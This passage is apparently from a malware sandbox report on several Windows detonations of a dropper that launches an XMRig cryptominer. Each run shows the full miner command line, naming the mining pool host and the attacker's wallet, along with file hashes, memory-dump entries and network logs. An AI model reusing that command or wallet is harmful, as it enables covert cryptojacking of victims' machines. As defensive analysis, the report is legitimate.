| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.197.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2748-16-0x000001899D310000-0x000001899D330000-memory.dmp
memory/2748-17-0x000001899EB20000-0x000001899EB40000-memory.dmp
memory/2748-18-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-20-0x000001899EB40000-0x000001899EB60000-memory.dmp
memory/2748-19-0x000001899EB60000-0x000001899EB80000-memory.dmp
memory/2748-21-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-22-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-25-0x000001899EB40000-0x000001899EB60000-memory.dmp
memory/2748-24-0x000001899EB60000-0x000001899EB80000-memory.dmp
memory/2748-23-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-26-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-27-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-28-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-29-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-30-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-31-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-32-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-33-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-34-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-35-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-36-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-37-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-38-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-39-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-40-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-41-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-42-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-43-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-44-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-45-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-46-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-47-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-48-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-49-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-50-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-51-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-52-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-53-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-54-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-55-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-56-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-57-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-58-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-59-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-60-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-61-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-62-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-63-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-64-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-65-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-66-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-67-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-68-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-69-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-70-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-71-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-72-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-73-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-74-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-75-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-76-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-77-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-78-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-79-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-80-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-81-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-82-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-83-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-84-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240508-en
Max time kernel
1798s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4344 wrote to memory of 4824 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4344 wrote to memory of 4824 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4824-16-0x0000023095C40000-0x0000023095C60000-memory.dmp
memory/4824-17-0x0000023095EA0000-0x0000023095EC0000-memory.dmp
memory/4824-18-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-19-0x0000023095EC0000-0x0000023095EE0000-memory.dmp
memory/4824-20-0x000002312A030000-0x000002312A050000-memory.dmp
memory/4824-21-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-22-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-25-0x000002312A030000-0x000002312A050000-memory.dmp
memory/4824-24-0x0000023095EC0000-0x0000023095EE0000-memory.dmp
memory/4824-23-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-26-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-27-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-28-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-29-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-30-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-31-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-32-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-33-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-34-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-35-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-36-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-37-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-38-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-39-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-40-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-41-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-42-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-43-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-44-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-45-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-46-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-47-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-48-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-49-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-50-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-51-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-52-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-53-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-54-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-55-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-56-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-57-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-58-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-59-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-60-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-61-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-62-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-63-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-64-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-65-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-66-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-67-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-68-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-69-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-70-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-71-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-72-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-73-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-74-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-75-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-76-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-77-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-78-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-79-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-80-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-81-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-82-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-83-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-84-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 19:49
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3196 wrote to memory of 4456 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3196 wrote to memory of 4456 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.183.117.104.in-addr.arpa | udp |
| US | 52.111.227.11:443 | | tcp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4456-16-0x000002358C8F0000-0x000002358C910000-memory.dmp
memory/4456-17-0x000002358C940000-0x000002358C960000-memory.dmp
memory/4456-18-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-20-0x000002358C960000-0x000002358C980000-memory.dmp
memory/4456-19-0x000002358C980000-0x000002358C9A0000-memory.dmp
memory/4456-21-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-22-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-23-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-24-0x000002358C980000-0x000002358C9A0000-memory.dmp
memory/4456-25-0x000002358C960000-0x000002358C980000-memory.dmp
memory/4456-26-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-27-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-28-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-29-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-30-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-31-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-32-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-33-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-34-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-35-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-36-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-37-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-38-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-39-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-40-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-41-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-42-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-43-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-44-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-45-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-46-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-47-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-48-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-49-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-50-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-51-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-52-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-53-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-54-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-55-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-56-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-57-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-58-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-59-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-60-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-61-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-62-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-63-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-64-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-65-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-66-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-67-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-68-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-69-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-70-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-71-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-72-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-73-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-74-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-75-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-76-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-77-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-78-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-79-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-80-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-81-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-82-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-83-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-84-0x00007FF795730000-0x00007FF796233000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240508-en
Max time kernel
1797s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1780 wrote to memory of 4652 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1780 wrote to memory of 4652 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
